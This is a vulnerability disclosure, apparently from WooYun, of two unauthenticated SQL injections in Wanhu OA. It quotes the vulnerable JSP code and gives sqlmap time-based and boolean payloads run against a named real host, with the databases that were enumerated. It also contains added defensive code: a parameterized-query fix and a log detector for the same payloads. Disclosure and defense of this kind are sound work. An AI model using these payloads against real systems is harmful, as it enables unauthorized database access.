
Wanhu OA: two blind SQL injections with DBA privileges (no login required)

2014-09-15 22:20

First, the time-based blind injection, which affects both the Standard and the Professional edition.

Injection point:

/defaultroot/outMailLoginCheck.jsp

<%@ page contentType="text/html; charset=GBK"%>
<%
// Dun'an external mail login check
com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase();
try{
    java.sql.Connection conn = dsb.getDataSource().getConnection();
    java.sql.Statement stmt = conn.createStatement();
    // userAccount and outMailRandom are concatenated straight into the SQL text: the injection point
    java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'");
    if(rs.next()){
        out.print(true);
    }else{
        out.print(false);
    }
    conn.close();
}catch(Exception e){}   // errors are swallowed, so nothing but true/false ever reaches the response
%>
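A hardened form of the lookup above, as an added example (not code from the page or from Wanhu OA): the same query through a PreparedStatement, so userAccount and outMailRandom are bound as parameters and can never become SQL text. To run without a database, the JDBC objects are stand-ins built with java.lang.reflect.Proxy over a constructed in-memory map; the table EZOFFICE.OA_MAILLOGIN and its columns come from the page, the sample row and the class and method names are assumptions.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class MailLoginCheck {

    // The SQL text is a constant; the two values are bound, never concatenated.
    static final String SQL =
        "SELECT 1 FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT = ? AND RANDOM = ?";

    // Hardened replacement for the lookup in outMailLoginCheck.jsp.
    static boolean mailLoginExists(Connection conn, String userAccount, String random)
            throws SQLException {
        if (userAccount == null || random == null) {
            return false; // the original turned a missing parameter into the literal "null"
        }
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setString(1, userAccount);
            ps.setString(2, random);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    // ---- Constructed stand-in for a JDBC driver (not a real database). ----
    // The proxies record the SQL text and bound parameters and answer from a
    // map of USERACCOUNT -> RANDOM; only the methods used above are implemented.

    static Connection fakeConnection(Map<String, String> table, List<String> sqlLog) {
        return (Connection) Proxy.newProxyInstance(
            Connection.class.getClassLoader(), new Class<?>[] {Connection.class},
            (proxy, method, args) -> {
                if (method.getName().equals("prepareStatement")) {
                    sqlLog.add((String) args[0]);
                    return fakeStatement(table);
                }
                return defaultValue(method);
            });
    }

    static PreparedStatement fakeStatement(Map<String, String> table) {
        String[] params = new String[2];
        return (PreparedStatement) Proxy.newProxyInstance(
            PreparedStatement.class.getClassLoader(), new Class<?>[] {PreparedStatement.class},
            (proxy, method, args) -> {
                switch (method.getName()) {
                    case "setString": {
                        params[(Integer) args[0] - 1] = (String) args[1];
                        return null;
                    }
                    case "executeQuery": {
                        // A bound value is compared as one whole string, whatever it contains.
                        boolean found = params[0] != null && params[1] != null
                            && params[1].equals(table.get(params[0]));
                        return fakeResultSet(found);
                    }
                    default:
                        return defaultValue(method);
                }
            });
    }

    static ResultSet fakeResultSet(boolean found) {
        boolean[] consumed = {false};
        return (ResultSet) Proxy.newProxyInstance(
            ResultSet.class.getClassLoader(), new Class<?>[] {ResultSet.class},
            (proxy, method, args) -> {
                if (method.getName().equals("next")) {
                    boolean hasRow = found && !consumed[0];
                    consumed[0] = true;
                    return hasRow;
                }
                return defaultValue(method);
            });
    }

    // Neutral results for the void/boolean/int methods the code above may call
    // (close() and friends); nothing else is invoked on the stand-ins.
    static Object defaultValue(Method m) {
        Class<?> r = m.getReturnType();
        if (r == boolean.class) return false;
        if (r == int.class) return 0;
        return null;
    }

    public static void main(String[] args) throws SQLException {
        Map<String, String> table = Map.of("alice", "r4nd0m"); // constructed sample row
        List<String> sqlLog = new ArrayList<>();
        Connection conn = fakeConnection(table, sqlLog);

        System.out.println("valid pair:        " + mailLoginExists(conn, "alice", "r4nd0m"));
        System.out.println("wrong random:      " + mailLoginExists(conn, "alice", "nope"));
        // The page's time-based payload is now just an account name that matches no row.
        String payload = "' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW";
        System.out.println("sqlmap payload:    " + mailLoginExists(conn, payload, ""));
        System.out.println("distinct SQL sent: " + sqlLog.stream().distinct().count());
    }
}
```

The last line of output is the property that matters: every call sends the identical SQL text, and the sqlmap payload is compared as a literal account name, so neither the BENCHMARK() delay nor the quote-breaking has anything to act on. The same change applies to the second injection point below, where menuname should be bound the same way instead of being concatenated into the OA_MENUSET and oa_custmenu queries.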



It is obviously a blind injection. With the OA_MAILLOGIN table empty by default, only the slower time-based blind technique is available, so point sqlmap at it directly with technique=T.

First, the Standard edition:

http://oa.frjt.net:8081/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=

sqlmap identified the following injection points with a total of 125 HTTP(s) requests:

---

Place: GET

Parameter: userAccount

Type: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom=

---

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0



Then the Professional edition:

[Image: oa延时盲注.jpg (screenshot of the time-based blind injection against the Professional edition)]

Proof of vulnerability:

Next is the boolean-based blind injection, which only the Standard edition has.

/defaultroot/synccustomize_simple.jsp

<%
String flag=request.getParameter("flag");
String menuname = request.getParameter("menuname");
if("sync".equals(flag)){
    //data
    String s_String = "";
    int s_int = 0;

    String[][] res = null;
    DbOpt dbopt = null;

    try {
        dbopt = new DbOpt();
        String Sql = "";

        // menuname is concatenated straight into the WHERE clause: the injection point
        Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname from OA_MENUSET where menuname='"+menuname+"' ";

        res = dbopt.executeQueryToStrArr2(Sql,18);

        if(res != null){
            // the same unescaped menuname goes into a second query
            String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");
            s_int = Integer.parseInt(_cnt);
            .......
        }else if(s_int>1){
            s_String = "查出"+s_int+"条数据,未处理!";   // "Found N rows, not processed!"
        }
    }

    dbopt.close();

} catch (Exception e) {
    e.printStackTrace();
} finally {
    try {
        dbopt.close();
    } catch (SQLException ex) {
    }
}
%>
</table>

<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">
<tr>
<td><%=s_String%>&nbsp;</td>   <!-- s_String is echoed into the page, so a true and a false condition in menuname produce visibly different responses -->



Boolean-based blind injection works here; with a few more threads the speed is fine. Verification:

http://oa.frjt.net:8081/defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: menuname

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh

---

web application technology: JSP

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] ezoffice

[*] information_schema

[*] mysql
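Both injection points leave a recognisable trail in the web server's access log: sqlmap needed 125 requests for the time-based case above, every one carrying a BENCHMARK() call or a quoted tautology. The following detector is an added example (not code from the page or from Wanhu OA) that parses combined-format access log lines, URL-decodes each query string, flags the payload shapes shown on this page, and reports sources that sent several such requests to one path. The log lines are constructed samples using documentation IP addresses; the class and method names are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class BlindProbeDetector {

    // Combined log format: client IP, request line, status, size (other fields skipped).
    static final Pattern LOG_LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[[^\\]]+\\] \"(?:GET|POST) (\\S+) HTTP/[\\d.]+\" (\\d{3}) (\\S+)");

    // Shapes of the payloads shown on this page, matched on the URL-decoded query:
    // a quote followed by a numeric tautology, a BENCHMARK()/SLEEP() call, or a
    // quoted-string tautology such as 'pBAh'='pBAh.
    static final Pattern PROBE = Pattern.compile(
        "'\\s*(?:AND|OR)\\s+\\d+\\s*=\\s*\\d+"
        + "|BENCHMARK\\s*\\(|SLEEP\\s*\\("
        + "|'\\s*(?:AND|OR)\\s+'\\w+'\\s*=\\s*'\\w+",
        Pattern.CASE_INSENSITIVE);

    // Per "ip path": [total requests, requests whose query matched PROBE].
    static Map<String, int[]> analyze(List<String> lines) {
        Map<String, int[]> stats = new LinkedHashMap<>();
        for (String line : lines) {
            Matcher m = LOG_LINE.matcher(line);
            if (!m.find()) continue;
            String target = m.group(2);
            int q = target.indexOf('?');
            String path = q < 0 ? target : target.substring(0, q);
            String query = q < 0 ? "" : target.substring(q + 1);
            String decoded;
            try {
                decoded = URLDecoder.decode(query, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException e) {
                decoded = query; // malformed %-escape: inspect the raw text instead
            }
            int[] s = stats.computeIfAbsent(m.group(1) + " " + path, k -> new int[2]);
            s[0]++;
            if (PROBE.matcher(decoded).find()) s[1]++;
        }
        return stats;
    }

    // Sources that sent at least minFlagged probe-shaped requests to one path.
    static List<String> suspicious(Map<String, int[]> stats, int minFlagged) {
        List<String> out = new ArrayList<>();
        for (Map.Entry<String, int[]> e : stats.entrySet()) {
            if (e.getValue()[1] >= minFlagged) out.add(e.getKey());
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed sample lines: one legitimate request, then the page's payloads.
        List<String> lines = List.of(
            "198.51.100.7 - - [15/Sep/2014:22:10:03 +0800] \"GET /defaultroot/outMailLoginCheck.jsp?userAccount=alice&outMailRandom=r4nd0m HTTP/1.1\" 200 4",
            "203.0.113.5 - - [15/Sep/2014:22:20:01 +0800] \"GET /defaultroot/outMailLoginCheck.jsp?userAccount=%27%20AND%204843%3DBENCHMARK(5000000%2CMD5(0x4758714c))%20AND%20%27YsEW%27%3D%27YsEW&outMailRandom= HTTP/1.1\" 200 5",
            "203.0.113.5 - - [15/Sep/2014:22:20:09 +0800] \"GET /defaultroot/outMailLoginCheck.jsp?userAccount=%27%20AND%204843%3DBENCHMARK(5000000%2CMD5(0x4758714c))%20AND%20%27YsEW%27%3D%27YsEW&outMailRandom= HTTP/1.1\" 200 5",
            "203.0.113.5 - - [15/Sep/2014:22:20:17 +0800] \"GET /defaultroot/outMailLoginCheck.jsp?userAccount=%27%20AND%204843%3DBENCHMARK(5000000%2CMD5(0x4758714c))%20AND%20%27YsEW%27%3D%27YsEW&outMailRandom= HTTP/1.1\" 200 5",
            "203.0.113.5 - - [15/Sep/2014:22:21:30 +0800] \"GET /defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B%27%20AND%208760%3D8760%20AND%20%27pBAh%27%3D%27pBAh HTTP/1.1\" 200 812");

        Map<String, int[]> stats = analyze(lines);
        for (Map.Entry<String, int[]> e : stats.entrySet()) {
            System.out.println(e.getKey() + "  requests=" + e.getValue()[0] + " probes=" + e.getValue()[1]);
        }
        System.out.println("suspicious: " + suspicious(stats, 3));
    }
}
```

Two caveats for real logs. The boolean-based case on this page was sent as POST, and a POST body never appears in a standard access log, so that injection point needs request-body logging (a WAF or application-level log) to be seen at all. And the threshold of 3 is only for the sample: a real scan looks like the 125 requests reported above, and the BENCHMARK() probes additionally stand out as abnormally slow responses if the log includes a response-time field.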

Remediation:

Source: www.wooyun.org/bugs/wooyun-2014-065275
